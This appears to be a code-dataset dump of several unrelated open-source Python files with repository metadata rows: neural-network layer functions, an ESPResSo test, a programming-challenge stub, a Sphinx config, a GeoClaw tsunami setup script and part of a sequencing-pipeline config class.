        for col in range(out_w):
            left = col * stride
            window = x[:, :, top:top + ph, left:left + pw]
            max_vals = window.max(axis=(2, 3)).reshape(N, C, 1, 1)
            # NOTE: if several cells tie for the maximum, each one receives
            # the full upstream gradient (preserved from the original
            # implementation).
            mask = window >= max_vals
            delta = dout[:, :, row, col].reshape(N, C, 1, 1)
            # Accumulate (+=) rather than assign: with overlapping pooling
            # windows (stride < pool size) an assignment would overwrite the
            # gradient contributed by earlier windows.
            dx[:, :, top:top + ph, left:left + pw] += delta * mask
    return dx
def spatial_batchnorm_forward(x, gamma, beta, bn_param):
    """
    Forward pass for spatial batch normalization.

    Each of the C channels is normalized over the N*H*W values it takes
    across the minibatch, by moving channels last, flattening to
    (N*H*W, C), and delegating to the vanilla batchnorm_forward.

    Inputs:
    - x: input data of shape (N, C, H, W)
    - gamma: scale parameter, of shape (C,)
    - beta: shift parameter, of shape (C,)
    - bn_param: same dictionary as for batchnorm_forward

    Returns a tuple of:
    - out: output data, of shape (N, C, H, W)
    - cache: values needed for the backward pass
    """
    N, C, H, W = x.shape
    # (N, C, H, W) -> (N, H, W, C) -> (N*H*W, C): channels become features.
    flat = x.transpose(0, 2, 3, 1).reshape(-1, C)
    flat_out, cache = batchnorm_forward(flat, gamma, beta, bn_param)
    # Undo the layout change to recover the (N, C, H, W) output.
    out = flat_out.reshape(N, H, W, C).transpose(0, 3, 1, 2)
    return out, cache
def spatial_batchnorm_backward(dout, cache):
    """
    Backward pass for spatial batch normalization.

    Mirrors the layout trick of spatial_batchnorm_forward: flatten the
    upstream gradient to (N*H*W, C), delegate to batchnorm_backward, then
    restore the (N, C, H, W) layout.

    Inputs:
    - dout: upstream derivatives, of shape (N, C, H, W)
    - cache: values from the forward pass

    Returns a tuple of:
    - dx: gradient with respect to inputs, of shape (N, C, H, W)
    - dgamma: gradient with respect to the scale parameter, of shape (C,)
    - dbeta: gradient with respect to the shift parameter, of shape (C,)
    """
    N, C, H, W = dout.shape
    # (N, C, H, W) -> (N*H*W, C), matching the forward-pass flattening.
    flat_dout = dout.transpose(0, 2, 3, 1).reshape(-1, C)
    flat_dx, dgamma, dbeta = batchnorm_backward(flat_dout, cache)
    # Undo the layout change on the input gradient.
    dx = flat_dx.reshape(N, H, W, C).transpose(0, 3, 1, 2)
    return dx, dgamma, dbeta
def svm_loss(x, y):
    """
    Multiclass SVM (hinge) loss and gradient.

    Inputs:
    - x: scores, of shape (N, C); x[i, j] is the score for class j on input i
    - y: labels, of shape (N,), with 0 <= y[i] < C

    Returns a tuple of:
    - loss: scalar hinge loss averaged over the batch
    - dx: gradient of the loss with respect to x
    """
    num = x.shape[0]
    rows = np.arange(num)
    correct = x[rows, y][:, np.newaxis]
    # Hinge margins with a margin of 1; the correct class contributes 0.
    margins = np.maximum(0, x - correct + 1.0)
    margins[rows, y] = 0
    loss = margins.sum() / num

    # Each violating class pushes its own score up by 1/N; the correct class
    # is pushed down once per violating class.
    dx = (margins > 0).astype(x.dtype)
    dx[rows, y] -= dx.sum(axis=1)
    dx /= num
    return loss, dx
def softmax_loss(x, y):
    """
    Softmax (cross-entropy) loss and gradient.

    Inputs:
    - x: scores, of shape (N, C); x[i, j] is the score for class j on input i
    - y: labels, of shape (N,), with 0 <= y[i] < C

    Returns a tuple of:
    - loss: scalar cross-entropy loss averaged over the batch
    - dx: gradient of the loss with respect to x
    """
    # Shift by the row max for numerical stability before exponentiating.
    shifted = x - x.max(axis=1, keepdims=True)
    log_norm = np.log(np.exp(shifted).sum(axis=1, keepdims=True))
    log_probs = shifted - log_norm
    num = x.shape[0]
    rows = np.arange(num)
    loss = -log_probs[rows, y].sum() / num
    # d(loss)/dx = softmax(x) - one_hot(y), averaged over the batch.
    dx = np.exp(log_probs)
    dx[rows, y] -= 1
    dx /= num
    return loss, dx
| kabrapratik28/Stanford_courses | cs231n/assignment2/cs231n/layers.py | Python | apache-2.0 | 30,161 | [
"NEURON"
] | 2866e45c290a7cc3676b6ecf14d505e7681cc91cadb0ebf8c8c242f6dd38a4f6 |
#
# Copyright (C) 2019-2020 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import unittest as ut
import unittest_decorators as utx
import stokesian_dynamics as sd
@utx.skipIfMissingFeatures(["STOKESIAN_DYNAMICS"])
class StokesianDynamicsSetupTest(sd.StokesianDynamicsSetupTest):
    # Run the shared Stokesian Dynamics setup checks on the CPU backend.
    device = 'cpu'

    def test_pbc_checks(self):
        # Periodic-boundary-condition validation provided by the base class.
        self.pbc_checks()
@utx.skipIfMissingFeatures(["STOKESIAN_DYNAMICS"])
class StokesianDynamicsTest(sd.StokesianDynamicsTest):
    # Falling-spheres scenarios from the shared module, on the CPU backend.
    # The three positional arguments are the parameters the base class
    # varies between cases (see stokesian_dynamics.falling_spheres).
    device = 'cpu'

    def test_default(self):
        self.falling_spheres(1.0, 1.0, 1.0)

    def test_rescaled(self):
        self.falling_spheres(1.0, 4.5, 2.5)

    def test_different_time_step(self):
        self.falling_spheres(0.7, 1.0, 1.0)

    def test_default_ft(self):
        # Same default scenario, using the 'ft' (force/torque) variant.
        self.falling_spheres(1.0, 1.0, 1.0, 'ft')
@utx.skipIfMissingFeatures(["STOKESIAN_DYNAMICS"])
class StokesianDiffusionTest(sd.StokesianDiffusionTest):
    # Run the shared diffusion check on the CPU backend.
    device = 'cpu'

    def test(self):
        self.check()
if __name__ == '__main__':
ut.main()
| KaiSzuttor/espresso | testsuite/python/stokesian_dynamics_cpu.py | Python | gpl-3.0 | 1,652 | [
"ESPResSo"
] | 10cabb69806d48f68e60b3df0c4db5c135ba74e10dd64d4e5ef60a79a1dea80c |
"""
[4-19-2014] Challenge #154 [Intermediate] Gorellian Alphabet Sort
https://www.reddit.com/r/dailyprogrammer/comments/20sjif/4192014_challenge_154_intermediate_gorellian/
#**Description:**
The Gorellians, at the far end of our galaxy, have discovered various samples of English text from our electronic
transmissions, but they did not find the order of our alphabet. Being a very organized and orderly species, they want
to have a way of ordering words, even in the strange symbols of English. Hence they must determine their own order.
For instance, if they agree on the alphabetical order:
UVWXYZNOPQRSTHIJKLMABCDEFG
Then the following words would be in sorted order based on the above alphabet order:
WHATEVER
ZONE
HOW
HOWEVER
HILL
ANY
ANTLER
COW
***
#**Input:**
The input will be formatted to enter the number of words to sort and the new Alphabet ordering and a list of words to
sort. n should be > 0. The alphabet is assumed to be 26 letters with no duplicates and arranged in the new order. Also
assumed there are n strings entered.
n (new alphabet ordering)
(word 1 of n)
(word 2 of n)
....
(word n of n)
##Example input 1:
8 UVWXYZNOPQRSTHIJKLMABCDEFG
ANTLER
ANY
COW
HILL
HOW
HOWEVER
WHATEVER
ZONE
***
#**Output:**
The list of words in sorted order based on the new order of the alphabet. The sort order should be based on the
alphabet (case insensitive) and the words should be output to appear as the words were entered.
##Example of output for input 1:
WHATEVER
ZONE
HOW
HOWEVER
HILL
ANY
ANTLER
COW
***
#**Notes:**
The sorting should be case insensitive. Meaning that you do not sort it based on the ASCII value of the letters but by
the letters. Your solution should handle an alphabet order that might be typed in upper/lower case. It will sort the
words by this order and output the words as they were typed in.
##Example Input 2:
5 ZYXWVuTSRQpONMLkJIHGFEDCBa
go
aLL
ACM
teamS
Go
##Example output 2:
teamS
go
Go
aLL
ACM
***
#**Extra Challenge:**
Error check the input.
***
If the alphabet is missing letters it returns an error message and listing letters missing.
##Input for this:
4 abcdfghijklmnopsuvxz
error
checking
is
fun
##Output for this:
Error! Missing letters: e q r t w y
***
If the alphabet has duplicate letters it returns an error message listing all the duplicate letters used in the
alphabet.
##Input for this:
4 abcdefaghijklmnoepqrstiuvwoxuyz
oh
really
yah
really
##Output for this:
Error! Duplicate letters found in alphabet: a e i o u
***
#**Challenge Credit:**
Based on the idea from /r/dailyprogrammer_ideas
[(Link to Challenge idea)] (http://www.reddit.com/r/dailyprogrammer_ideas/comments/1yjruf/intermediate_sort_me/)
with some minor tweaks from me.
Thanks to /u/BlackholeDevice for submitting the idea!
Good luck everyone and have fun!
"""
def main():
pass
if __name__ == "__main__":
main()
| DayGitH/Python-Challenges | DailyProgrammer/DP20140419B.py | Python | mit | 2,857 | [
"Galaxy"
] | 088eff27c9f58bdbef853d22f60b0534969b912cd08f4fd2cc3398443cb85e26 |
# -*- coding: utf-8 -*-
import sys
import os
import datetime
import sphinx_bootstrap_theme
import matplotlib as mpl
mpl.use("Agg")
# Sphinx needs to be able to import fatiando to use autodoc
sys.path.append(os.path.pardir)
from fatiando import __version__, __commit__
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.autosummary',
'sphinx.ext.coverage',
'sphinx.ext.mathjax',
'sphinx.ext.doctest',
'sphinx.ext.viewcode',
'sphinx.ext.extlinks',
'matplotlib.sphinxext.plot_directive',
'sphinx_gallery.gen_gallery',
]
from mayavi import mlab
mlab.options.offscreen = True
# Configure the sphinx-gallery plugin
sphinx_gallery_conf = {
'examples_dirs': ['../gallery'],
'gallery_dirs': ['gallery'],
'filename_pattern': os.sep + '*', # Match any .py file
'find_mayavi_figures': True,
}
# Configure the inline plots from matplotlib plot_directive
plot_formats = [("png", 90)]
plot_html_show_formats = False
plot_html_show_source_link = False
# Sphinx project configuration
templates_path = ['_templates']
exclude_patterns = ['_build']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
master_doc = 'index'
# General information about the project
year = datetime.date.today().year
project = u'Fatiando a Terra'
copyright = u'2010-{:d}, Leonardo Uieda'.format(year)
if len(__version__.split('-')) > 1 or __version__ == 'unknown':
version = 'dev'
else:
version = __version__
# I'll use the release to place the commit hash at the footer of the site
release = __commit__.split('-')[0] # Get rid of -dirty
doi = '10.6084/m9.figshare.1115194'
# These enable substitutions using |variable| in the rst files
rst_epilog = """
.. |doi| replace:: {doi}
.. |doilink| replace:: doi:`{doi} <http://dx.doi.org/{doi}>`__
.. |year| replace:: {year}
""".format(doi=doi, year=year)
html_last_updated_fmt = '%b %d, %Y'
html_title = 'Fatiando {}'.format(version)
html_short_title = 'Fatiando a Terra'
html_logo = '_static/fatiando-logo.png'
html_favicon = u'favicon.ico'
html_static_path = ['_static']
html_extra_path = ['.nojekyll', 'CNAME']
html_use_smartypants = True
pygments_style = 'default'
add_function_parentheses = False
# Custom sidebar templates, maps document names to template names.
html_sidebars = {
'install': ['localtoc.html'],
'develop': ['localtoc.html'],
'cookbook': ['localtoc.html'],
'changelog': ['localtoc.html'],
'api/**': ['localtoc.html'],
'gallery/index': ['localtoc.html'],
}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'FatiandoATerraDoc'
# Theme config
html_theme = 'bootstrap'
html_theme_path = sphinx_bootstrap_theme.get_html_theme_path()
html_theme_options = {
'bootswatch_theme': "flatly",
'navbar_title': 'fatiando',
'navbar_site_name': "Site",
'navbar_links': [
("Installing", "install"),
("Documentation", "docs"),
("Cookbook", "cookbook"),
("Gallery", "gallery/index"),
("Developer Guide", "develop"),
('<i class="fa fa-github-square fa-lg" title="Source code on Github"></i>',
"https://github.com/fatiando/fatiando", True),
],
# Render the next and previous page links in navbar. (Default: true)
'navbar_sidebarrel': False,
# Render the current pages TOC in the navbar. (Default: true)
'navbar_pagenav': False,
# Tab name for the current pages TOC. (Default: "Page")
'navbar_pagenav_name': "This page",
# Global TOC depth for "site" navbar tab. (Default: 1)
# Switching to -1 shows all levels.
'globaltoc_depth': 1,
# Include hidden TOCs in Site navbar?
# Note: If this is "false", you cannot have mixed ``:hidden:`` and
# non-hidden ``toctree`` directives in the same page, or else the build
# will break.
# Values: "true" (default) or "false"
'globaltoc_includehidden': "false",
# HTML navbar class (Default: "navbar") to attach to <div> element.
# For black navbar, do "navbar navbar-inverse"
'navbar_class': "navbar navbar-default",
# Fix navigation bar to top of page?
# Values: "true" (default) or "false"
'navbar_fixed_top': "false",
# Location of link to source.
# Options are "nav" (default), "footer" or anything else to exclude.
'source_link_position': "footer",
'bootstrap_version': "3",
}
| mtb-za/fatiando | doc/conf.py | Python | bsd-3-clause | 5,315 | [
"Mayavi"
] | 040348a1f9a7d3295a40f25834afd9e8c77ccdf3bfbb8f885d88a4535bae4f68 |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
"""
Module to set up run time parameters for Clawpack.
The values set in the function setrun are then written out to data files
that will be read in by the Fortran code.
"""
import os
import numpy
import clawpack.geoclaw.dtopotools as dtopo
#------------------------------
def setrun(claw_pkg='geoclaw'):
#------------------------------
"""
Define the parameters used for running Clawpack.
INPUT:
claw_pkg expected to be "geoclaw" for this setrun.
OUTPUT:
rundata - object of class ClawRunData
"""
from clawpack.clawutil import data
assert claw_pkg.lower() == 'geoclaw', "Expected claw_pkg = 'geoclaw'"
num_dim = 2
rundata = data.ClawRunData(claw_pkg, num_dim)
#------------------------------------------------------------------
# Problem-specific parameters to be written to setprob.data:
#------------------------------------------------------------------
#probdata = rundata.new_UserData(name='probdata',fname='setprob.data')
#------------------------------------------------------------------
# GeoClaw specific parameters:
#------------------------------------------------------------------
rundata = setgeo(rundata)
#------------------------------------------------------------------
# Standard Clawpack parameters to be written to claw.data:
# (or to amr2ez.data for AMR)
#------------------------------------------------------------------
clawdata = rundata.clawdata # initialized when rundata instantiated
# Set single grid parameters first.
# See below for AMR parameters.
# ---------------
# Spatial domain:
# ---------------
# Number of space dimensions:
clawdata.num_dim = num_dim
# Lower and upper edge of computational domain:
clawdata.lower[0] = -118.0 # west longitude
clawdata.upper[0] = -86.0 # east longitude
clawdata.lower[1] = 7.0 # south latitude
clawdata.upper[1] = 21.0 # north latitude
# Number of grid cells
res_factor = 1
clawdata.num_cells[0] = 32 * res_factor
clawdata.num_cells[1] = 14 * res_factor
# ---------------
# Size of system:
# ---------------
# Number of equations in the system:
clawdata.num_eqn = 3
# Number of auxiliary variables in the aux array (initialized in setaux)
clawdata.num_aux = 4
# Index of aux array corresponding to capacity function, if there is one:
clawdata.capa_index = 2
# -------------
# Initial time:
# -------------
clawdata.t0 = 0.0
# Restart from checkpoint file of a previous run?
# Note: If restarting, you must also change the Makefile to set:
# RESTART = True
# If restarting, t0 above should be from original run, and the
# restart_file 'fort.chkNNNNN' specified below should be in
# the OUTDIR indicated in Makefile.
clawdata.restart = False # True to restart from prior results
clawdata.restart_file = 'fort.chk00036' # File to use for restart data
# -------------
# Output times:
#--------------
# Specify at what times the results should be written to fort.q files.
# Note that the time integration stops after the final output time.
# The solution at initial time t0 is always written in addition.
clawdata.output_style = 2
if clawdata.output_style==1:
# Output nout frames at equally spaced times up to tfinal:
hours = 4
output_per_hour = 12
clawdata.num_output_times = hours * output_per_hour
clawdata.tfinal = float(hours) * 3600.0
clawdata.output_t0 = True # output at initial (or restart) time?
elif clawdata.output_style == 2:
# Specify a list of output times.
clawdata.output_times = [float(time) for time in xrange(0,250,25)]
acapulco_time_zoom = numpy.linspace(0.07, 0.2, 10) * 3600.0
for new_time in acapulco_time_zoom:
clawdata.output_times.append(new_time)
hours = 4
output_per_hour = 6
for time in numpy.linspace(0, hours * 3600, output_per_hour * hours + 1):
if time > clawdata.output_times[-1]:
clawdata.output_times.append(float(time))
elif clawdata.output_style == 3:
# Output every iout timesteps with a total of ntot time steps:
clawdata.output_step_interval = 1
clawdata.total_steps = 3
clawdata.output_t0 = True
clawdata.output_format = 'binary' # 'ascii' or 'netcdf'
clawdata.output_q_components = 'all' # need all
clawdata.output_aux_components = 'none' # eta=h+B is in q
clawdata.output_aux_onlyonce = False # output aux arrays each frame
# ---------------------------------------------------
# Verbosity of messages to screen during integration:
# ---------------------------------------------------
# The current t, dt, and cfl will be printed every time step
# at AMR levels <= verbosity. Set verbosity = 0 for no printing.
# (E.g. verbosity == 2 means print only on levels 1 and 2.)
clawdata.verbosity = 3
# --------------
# Time stepping:
# --------------
# if dt_variable==1: variable time steps used based on cfl_desired,
# if dt_variable==0: fixed time steps dt = dt_initial will always be used.
clawdata.dt_variable = True
# Initial time step for variable dt.
# If dt_variable==0 then dt=dt_initial for all steps:
clawdata.dt_initial = 2.
# Max time step to be allowed if variable dt used:
clawdata.dt_max = 1e+99
# Desired Courant number if variable dt used, and max to allow without
# retaking step with a smaller dt:
clawdata.cfl_desired = 0.75
clawdata.cfl_max = 1.0
# Maximum number of time steps to allow between output times:
clawdata.steps_max = 5000
# ------------------
# Method to be used:
# ------------------
# Order of accuracy: 1 => Godunov, 2 => Lax-Wendroff plus limiters
clawdata.order = 2
# Use dimensional splitting? (not yet available for AMR)
clawdata.dimensional_split = 'unsplit'
# For unsplit method, transverse_waves can be
# 0 or 'none' ==> donor cell (only normal solver used)
# 1 or 'increment' ==> corner transport of waves
# 2 or 'all' ==> corner transport of 2nd order corrections too
clawdata.transverse_waves = 2
# Number of waves in the Riemann solution:
clawdata.num_waves = 3
# List of limiters to use for each wave family:
# Required: len(limiter) == num_waves
# Some options:
# 0 or 'none' ==> no limiter (Lax-Wendroff)
# 1 or 'minmod' ==> minmod
# 2 or 'superbee' ==> superbee
# 3 or 'mc' ==> MC limiter
# 4 or 'vanleer' ==> van Leer
clawdata.limiter = ['mc', 'mc', 'mc']
clawdata.use_fwaves = True # True ==> use f-wave version of algorithms
# Source terms splitting:
# src_split == 0 or 'none' ==> no source term (src routine never called)
# src_split == 1 or 'godunov' ==> Godunov (1st order) splitting used,
# src_split == 2 or 'strang' ==> Strang (2nd order) splitting used, not recommended.
clawdata.source_split = 'godunov'
# --------------------
# Boundary conditions:
# --------------------
# Number of ghost cells (usually 2)
clawdata.num_ghost = 2
# Choice of BCs at xlower and xupper:
# 0 => user specified (must modify bcN.f to use this option)
# 1 => extrapolation (non-reflecting outflow)
# 2 => periodic (must specify this at both boundaries)
# 3 => solid wall for systems where q(2) is normal velocity
clawdata.bc_lower[0] = 'extrap'
clawdata.bc_upper[0] = 'extrap'
clawdata.bc_lower[1] = 'extrap'
clawdata.bc_upper[1] = 'extrap'
# Specify when checkpoint files should be created that can be
# used to restart a computation.
clawdata.checkpt_style = 1
if clawdata.checkpt_style == 0:
# Do not checkpoint at all
pass
elif clawdata.checkpt_style == 1:
# Checkpoint only at tfinal.
pass
elif clawdata.checkpt_style == 2:
# Specify a list of checkpoint times.
clawdata.checkpt_times = [0.1,0.15]
elif clawdata.checkpt_style == 3:
# Checkpoint every checkpt_interval timesteps (on Level 1)
# and at the final time.
clawdata.checkpt_interval = 5
# ---------------
# AMR parameters:
# ---------------
amrdata = rundata.amrdata
# max number of refinement levels:
amrdata.amr_levels_max = 7
# List of refinement ratios at each level (length at least mxnest-1)
# Level 1 - (1.0º,1.0º) - (100950.057205 m,110772.872596 m)
# Level 2 - (0.25º,0.25º) - (25237.5143013 m,27693.2181489 m)
# Level 3 - (0.125º,0.125º) - (12618.7571506 m,13846.6090744 m)
# Level 4 - (0.0625º,0.0625º) - (6309.37857532 m,6923.30453722 m)
# Level 5 - (0.0104166666667º,0.0104166666667º) - (1051.56309589 m,1153.88408954 m)
# Level 6 - (0.00130208333333º,0.00130208333333º) - (131.445386986 m,144.235511192 m)
# Level 7 - (8.13802083333e-05º,8.13802083333e-05º) - (8.21533668662 m,9.01471944951 m))
amrdata.refinement_ratios_x = [4,2,2,6,8,8]
amrdata.refinement_ratios_y = [4,2,2,6,8,8]
amrdata.refinement_ratios_t = [4,2,2,6,8,8]
# Specify type of each aux variable in amrdata.auxtype.
# This must be a list of length maux, each element of which is one of:
# 'center', 'capacity', 'xleft', or 'yleft' (see documentation).
amrdata.aux_type = ['center','capacity','yleft','center']
# Flag using refinement routine flag2refine rather than richardson error
amrdata.flag_richardson = False # use Richardson?
amrdata.flag2refine = True
# steps to take on each level L between regriddings of level L+1:
amrdata.regrid_interval = 3
# width of buffer zone around flagged points:
# (typically the same as regrid_interval so waves don't escape):
amrdata.regrid_buffer_width = 2
# clustering alg. cutoff for (# flagged pts) / (total # of cells refined)
# (closer to 1.0 => more small grids may be needed to cover flagged cells)
amrdata.clustering_cutoff = 0.700000
# print info about each regridding up to this level:
amrdata.verbosity_regrid = 0
# ----- For developers -----
# Toggle debugging print statements:
amrdata.dprint = False # print domain flags
amrdata.eprint = False # print err est flags
amrdata.edebug = False # even more err est flags
amrdata.gprint = False # grid bisection/clustering
amrdata.nprint = False # proper nesting output
amrdata.pprint = False # proj. of tagged points
amrdata.rprint = False # print regridding summary
amrdata.sprint = False # space/memory output
amrdata.tprint = True # time step reporting each level
amrdata.uprint = False # update/upbnd reporting
# More AMR parameters can be set -- see the defaults in pyclaw/data.py
# ---------------
# Regions:
# ---------------
rundata.regiondata.regions = []
rundata.regiondata.regions.append([7,7,0.0,1e10, -99.930021, -99.830477, 16.780640, 16.870122])
# to specify regions of refinement append lines of the form
# [minlevel,maxlevel,t1,t2,x1,x2,y1,y2]
# Region Long (E) Lat (N)
# Acapulco -99º 52' 41.10" 16º 50' 18.19"
#rundata.regiondata.regions.append([1, 6, 0.0, 1e10,
# -100.1, -99.66666667,
# 16.7, 16.96666667])
# Ixtapa-Zihuatanejo -101º 33' 8.61" 17º 38' 15.15"
# Puerto Angel -96º 29' 35.08" 15º 39' 53.28"
# Lázaro Cárdenas -102º 9' 54.86" 17º 55' 30.66"
#rundata.regiondata.regions.append([1, 6, 0.0, 1e10,
# -102.2440361, -102.0918583,
# 17.89015556, 17.99216667])
# ---------------
# Gauges:
# ---------------
degminsec2dec = lambda deg, minutes, seconds: float(deg) + (float(minutes) + float(seconds) / 60.0) / 60.0
rundata.gaugedata.gauges = []
# for gauges append lines of the form [gaugeno, x, y, t1, t2]
# ID Location Name Lat Long
# 1 Manzanillo, Col. 19º 3.4 N 104º 19.1 W
# rundata.gaugedata.gauges.append([1, -104.3183333, 19.05666667, 0.0, 1.e10])
# 2 Ixtapa, Gro. 17º 40.1 N 101º 38.7 W
# rundata.gaugedata.gauges.append([2, -101.645, 17.66833333, 0.0, 1.e10])
# 3 Zihuatanejo, Gro. 17º 38.2 N 101º 33.5 W
# rundata.gaugedata.gauges.append([3, -101.5583333, 17.63666667, 0.0, 1.e10])
# 4 Acapulco, Gro. 16º 50.3 N 99º 54.2 W
rundata.gaugedata.gauges.append([4, -99.90333333, 16.83833333, 0.0, 1.e10])
# 5 Isla Socorro, Col. 18º 43.5 N 110º 57.0 W
# rundata.gaugedata.gauges.append([5, -110.95, 18.725, 0.0, 1.e10])
# 6 Puerto Angel, Oax 15º 40 N 96º 29.5 W
# rundata.gaugedata.gauges.append([6, -degminsec2dec(96,29.5,0), degminsec2dec(15,40,0), 0.0, 1.e10])
# 7 Salina Cruz, Oax. 16º 19.1 N 95º 11.8 W
rundata.gaugedata.gauges.append([7, -degminsec2dec(95,11.8,0), degminsec2dec(16,19.1,0.0), 0.0, 1.e10])
# 8 Puerto Madero, Chis 14º 42.7 N 92º 24.1 W
# rundata.gaugedata.gauges.append([8, -degminsec2dec(92,24.1,0), degminsec2dec(14,42.7,0), 0.0, 1.e10])
# 9 Lazaro Cardenas, Mich 17º 56.4 N 102º 10.7 W
# rundata.gaugedata.gauges.append([9, -degminsec2dec(102,10.7,0.0), degminsec2dec(17,56.4,0.0), 0.0, 1.e10])
# 10 Huatulco 15° 45'.2 N 96° 07'.8 W
# rundata.gaugedata.gauges.append([10, -degminsec2dec(96,7.8,0.0), degminsec2dec(15,45.2,0.0), 0.0, 1.e10])
# 11 Acapulco 16°51'9.00"N 99°52'50"W
rundata.gaugedata.gauges.append([11, -degminsec2dec(99,52,50), degminsec2dec(16,51,9), 0.0, 1.e10])
# 12 Acapulco additional gauges
rundata.gaugedata.gauges.append([12, -99.904294, 16.839721, 0.0, 1.e10])
rundata.gaugedata.gauges.append([13, -99.905197, 16.840743, 0.0, 1.e10])
rundata.gaugedata.gauges.append([14, -99.903940, 16.842113, 0.0, 1.e10])
rundata.gaugedata.gauges.append([15, -99.902489, 16.843462, 0.0, 1.e10])
rundata.gaugedata.gauges.append([16, -99.898397, 16.845365, 0.0, 1.e10])
rundata.gaugedata.gauges.append([17, -99.891848, 16.851036, 0.0, 1.e10])
rundata.gaugedata.gauges.append([18, -99.860943, 16.848830, 0.0, 1.e10])
rundata.gaugedata.gauges.append([19, -99.856680, 16.839136, 0.0, 1.e10])
rundata.gaugedata.gauges.append([20, -99.888627, 16.816910, 0.0, 1.e10])
return rundata
# end of function setrun
# ----------------------
#-------------------
def setgeo(rundata):
#-------------------
"""
Set GeoClaw specific runtime parameters.
For documentation see ....
"""
try:
geo_data = rundata.geo_data
except:
print "*** Error, this rundata has no geo_data attribute"
raise AttributeError("Missing geo_data attribute")
# == Physics ==
geo_data.gravity = 9.81
geo_data.coordinate_system = 2
geo_data.earth_radius = 6367.5e3
# == Forcing Options
geo_data.coriolis_forcing = False
# == Algorithm and Initial Conditions ==
geo_data.sea_level = 0.0
geo_data.dry_tolerance = 1.e-3
geo_data.friction_forcing = True
geo_data.manning_coefficient = [0.03, 0.025]
geo_data.manning_break = [0.0]
geo_data.friction_depth = 1e6
# Refinement settings
refinement_data = rundata.refinement_data
refinement_data.variable_dt_refinement_ratios = True
refinement_data.wave_tolerance = 0.25
refinement_data.deep_depth = 200.0
refinement_data.max_level_deep = 5
# == settopo.data values ==
topo_data = rundata.topo_data
# for topography, append lines of the form
# [topotype, minlevel, maxlevel, t1, t2, fname]
topo_data.topofiles.append([3, 1, 5, 0., 1.e10,
os.path.abspath('./bathy/mexican_coast_pacific.tt3')])
# topo_data.topofiles.append([3, 6, 7, 0., 1.e10,
# os.path.abspath('./bathy/acapulco_projected_30m.tt2')])
topo_data.topofiles.append([2, 5, 7, 0., 1.e10,
os.path.abspath('./bathy/new_bathy/new_acapulco_bathy.tt2')])
# topo_data.topofiles.append([3, 1, 10, 0., 1.e10,
# os.path.abspath('./bathy/srtm_subsection.tt3')])
# == setdtopo.data values ==
dtopo_data = rundata.dtopo_data
# for moving topography, append lines of the form :
# [topotype, minlevel,maxlevel,fname]
dtopo_data.dtopofiles.append([1, 5, 5, 'bathy/rot_gapSvr1zvT.xyzt'])
#dtopo_data.dtopofiles.append([3, 5, 5, 'okada_1957Sm_du370.tt3'])
# subfault = dtopo.SubFault(units={"slip":"cm", "dimensions":"km", "depth":"km"})
# subfault.coordinates = [-99.25, 16.6]
# subfault.coordinate_specification = 'top center'
# subfault.slip = 200
# subfault.rake = 90.0
# subfault.strike = 296
# subfault.dip = 15.0
# subfault.depth = 4.0
# subfault.dimensions = (320.0, 80.0)
# subfault.my = 5e11
# subfault.write('./dtopo.tt3')
# dtopo_data.dtopofiles.append([3,5,5,'dtopo.tt3'])
# Note that if the run_faults.py script is used this is overriden there
# == setqinit.data values ==
rundata.qinit_data.qinit_type = 0
rundata.qinit_data.qinitfiles = []
# for qinit perturbations, append lines of the form: (<= 1 allowed for now!)
# [minlev, maxlev, fname]
# == setfixedgrids.data values ==
fixed_grids = rundata.fixed_grid_data
# for fixed grids append lines of the form
# [t1,t2,noutput,x1,x2,y1,y2,xpoints,ypoints,\
# ioutarrivaltimes,ioutsurfacemax]
# == fgmax.data values ==
fgmax_files = rundata.fgmax_data.fgmax_files
# for fixed grids append to this list names of any fgmax input files
# fgmax_files.append(os.path.abspath(os.path.join(os.getcwd(),'fgmax_grid.txt')))
return rundata
# end of function setgeo
# ----------------------
if __name__ == '__main__':
# Set up run-time parameters and write all data files.
import sys
rundata = setrun(*sys.argv[1:])
rundata.write()
| mandli/compsyn-geoclaw | setrun.py | Python | mit | 18,786 | [
"NetCDF"
] | 5b213ec177a82231e9ed16640b5ff9447c1164a3c841826f72380ee472436857 |
import csv
import yaml
import os
import glob
from pprint import pprint as pp
from utils import *
from constants import *
from logs import *
from seq_utils import *
from subprocess import Popen, PIPE
class config:
"""
Class for handling config set up.
"""
def __init__(self, config):
self.config_filename = config
self.config_name = config.replace(".yaml", "")
try:
self.config = yaml.load(open(config, 'r'))
except:
msg("Sample File not found", "error")
script_dir = os.path.dirname(os.path.realpath(__file__)).replace("/utils", "")
self.node_index = 0
# Set up Logs
self.general_log = general_log(self)
self.command_log = command_log(self)
# Options that are required within the config file.
self.reqd_options = ["reference",
"fastq_dir",
"bam_dir",
"log_dir",
"sample_file",
"chrom_chunk_kb",
"cores"]
# Check that required options are defined
for option in self.reqd_options:
undefined_options = []
for option in self.reqd_options:
if option not in self.config["OPTIONS"].keys():
undefined_options.append(option)
if undefined_options:
undefined_options = ', '.join(undefined_options)
analysis_filename = os.path.split(self.config_filename)[1]
msg("You must define OPTION(s) %s in %s" % (undefined_options, analysis_filename), "error")
# Set Options as base; for directories
for k, i in self.config["OPTIONS"].items():
setattr(self, k, i)
if k.endswith("dir") and k != "fastq_dir":
makedir(i)
# Set Commands as base directories
for analysis, values in self.config["COMMANDS"].items():
